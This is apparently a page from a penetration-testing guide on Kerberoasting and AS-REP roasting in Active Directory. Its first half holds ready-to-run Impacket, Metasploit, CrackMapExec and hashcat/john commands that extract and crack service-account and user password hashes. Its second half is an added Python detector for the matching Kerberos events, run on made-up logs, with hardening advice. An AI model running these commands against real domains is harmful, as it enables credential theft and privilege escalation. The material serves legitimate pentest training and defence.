This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Authenticated (Post-Compromise) Attacks

Kerberoasting

Purpose: Extract service account password hashes by requesting TGS tickets for accounts with SPNs, enabling offline password cracking.

Requirements: Valid domain user credentials (any domain user can perform Kerberoasting)

Attack Value: Service accounts often have elevated privileges and weaker passwords, providing a direct path to privilege escalation

Discovery and Extraction

Impacket Method

# Discover and extract Kerberoastable accounts
python3 GetUserSPNs.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile kerberoast.txt

# Alternative authentication methods
python3 GetUserSPNs.py -hashes :<NTLM-hash> <domain>/<username> -dc-ip <DC-IP> -request

Metasploit Method

# Kerberoasting through Metasploit framework
use auxiliary/gather/get_user_spns
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USERNAME <username>
set PASSWORD <password>
run

Offline Cracking

# Hashcat cracking (mode 13100 for Kerberos TGS)
hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt --force

# John the Ripper alternative
john --format=krb5tgs kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

AS-REP Roasting

Purpose: Target accounts without Kerberos pre-authentication to obtain AS-REP hashes for offline cracking.

Requirements: Domain credentials OR a username list for unauthenticated attempts

Attack Value: Targets accounts with legacy compatibility settings; the resulting hashes are often easier to crack than TGS hashes

Discovery and Extraction

Impacket Method

# Extract AS-REP hashes from vulnerable accounts
python3 GetNPUsers.py <domain>/<username>:<password> -dc-ip <DC-IP> -request -outputfile asrep.txt

# Unauthenticated approach with username list
python3 GetNPUsers.py <domain>/ -usersfile users.txt -dc-ip <DC-IP> -no-pass

CrackMapExec Method

# Automated AS-REP roasting
crackmapexec ldap <DC-IP> -u '<username>' -p '<password>' --asreproast asrep_output.txt

Metasploit Method

# AS-REP roasting via Metasploit
use auxiliary/gather/kerberos_enumusers
set RHOSTS <DC-IP>
set DOMAIN <domain.com>
set USER_FILE /path/to/users.txt
run

Offline Cracking

# Hashcat cracking (mode 18200 for AS-REP)
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt --force

# John the Ripper alternative
john --format=krb5asrep asrep.txt --wordlist=/usr/share/wordlists/rockyou.txt
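Detection Logic (Added Example)

Both techniques on this page leave a distinctive trace on the domain controller: Kerberoasting produces a burst of TGS requests (Security event 4769) for many different SPNs from one user, typically with the RC4 encryption type 0x17 (which is what hashcat mode 13100 cracks), and AS-REP roasting produces AS requests (event 4768) with Pre-Authentication Type 0, the value logged for accounts that have pre-authentication disabled. The script below is an added example written for this page, not part of the original guide or of any of the tools it references. It runs over a constructed, simplified key=value rendering of those two event types (a hypothetical export format, not the native Windows event XML) and flags both patterns; the log lines, account names, SPNs and IP addresses are all made up for the example.

```python
"""Flag Kerberoasting and AS-REP roasting patterns in Kerberos audit events.

Added example for this page. The input format is a hypothetical flattened
"timestamp key=value ..." export of Windows Security events 4769 and 4768;
adapt parse_events() to whatever your SIEM actually emits.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real telemetry). jdoe requests RC4 (0x17)
# tickets for four different SPNs within seconds; 10.0.0.5 then pulls AS-REPs
# for two accounts without pre-authentication. asmith is normal AES traffic.
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4769 Account=jdoe@CORP.LOCAL Service=MSSQLSvc/db01 EncType=0x12 ClientIP=10.0.0.5
2024-05-01T10:02:10 EventID=4769 Account=jdoe@CORP.LOCAL Service=MSSQLSvc/db01 EncType=0x17 ClientIP=10.0.0.5
2024-05-01T10:02:11 EventID=4769 Account=jdoe@CORP.LOCAL Service=HTTP/web01 EncType=0x17 ClientIP=10.0.0.5
2024-05-01T10:02:12 EventID=4769 Account=jdoe@CORP.LOCAL Service=CIFS/fs01 EncType=0x17 ClientIP=10.0.0.5
2024-05-01T10:02:13 EventID=4769 Account=jdoe@CORP.LOCAL Service=svc_backup EncType=0x17 ClientIP=10.0.0.5
2024-05-01T10:02:14 EventID=4769 Account=jdoe@CORP.LOCAL Service=WS01$ EncType=0x17 ClientIP=10.0.0.5
2024-05-01T10:30:00 EventID=4769 Account=asmith@CORP.LOCAL Service=HTTP/web01 EncType=0x12 ClientIP=10.0.0.9
2024-05-01T11:00:00 EventID=4768 Account=legacy_app PreAuthType=0 ClientIP=10.0.0.5
2024-05-01T11:00:00 EventID=4768 Account=svc_old PreAuthType=0 ClientIP=10.0.0.5
2024-05-01T11:05:00 EventID=4768 Account=asmith PreAuthType=2 ClientIP=10.0.0.9
"""


def parse_events(text):
    """Turn the flattened export into a list of dicts with a datetime 'ts'."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *pairs = line.split()
        rec = {"ts": datetime.fromisoformat(ts)}
        for pair in pairs:
            key, _, value = pair.partition("=")
            rec[key] = value
        events.append(rec)
    return events


def detect_kerberoasting(events, window_minutes=5, min_distinct_spns=3):
    """One (account, client IP) pair requesting RC4 TGS tickets for many
    distinct SPNs inside a short window is the classic Kerberoasting shape.
    Computer accounts (trailing '$') and krbtgt are excluded as noise."""
    by_source = defaultdict(list)
    for e in events:
        if e.get("EventID") != "4769" or e.get("EncType", "").lower() != "0x17":
            continue
        svc = e["Service"]
        if svc.endswith("$") or svc.lower().startswith("krbtgt"):
            continue
        by_source[(e["Account"], e["ClientIP"])].append((e["ts"], svc))

    window = timedelta(minutes=window_minutes)
    alerts = []
    for (account, ip), reqs in by_source.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            # Sliding window: distinct services requested within `window` of this one
            services = {s for t, s in reqs[i:] if t - start <= window}
            if len(services) >= min_distinct_spns:
                alerts.append({"account": account, "client_ip": ip,
                               "services": sorted(services)})
                break  # one alert per source is enough
    return alerts


def detect_asrep_roasting(events):
    """Pre-Authentication Type 0 in a 4768 means the KDC issued an AS-REP
    without pre-auth, i.e. the account is roastable. Group by client IP so a
    single source harvesting several such accounts stands out."""
    hits = defaultdict(set)
    for e in events:
        if e.get("EventID") == "4768" and e.get("PreAuthType") == "0":
            hits[e["ClientIP"]].add(e["Account"])
    return {ip: sorted(accounts) for ip, accounts in hits.items()}


if __name__ == "__main__":
    evts = parse_events(SAMPLE_LOG)
    for a in detect_kerberoasting(evts):
        print(f"[Kerberoasting] {a['account']} from {a['client_ip']}: {a['services']}")
    for ip, accounts in detect_asrep_roasting(evts).items():
        print(f"[AS-REP roasting] {ip} obtained AS-REPs for: {accounts}")
```

The RC4 filter is a design choice: modern domains negotiate AES by default, so a user suddenly asking for 0x17 tickets is the signal; if RC4 is still common in your environment, drop that filter and rely on the distinct-SPN count alone. On the hardening side, the same telemetry tells you which accounts to fix: any account appearing in a 4768 with pre-auth type 0 should have the "do not require Kerberos preauthentication" setting removed, and SPN-bearing accounts that yield crackable tickets need long random passwords (or migration to a managed service account) and AES-only encryption types.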
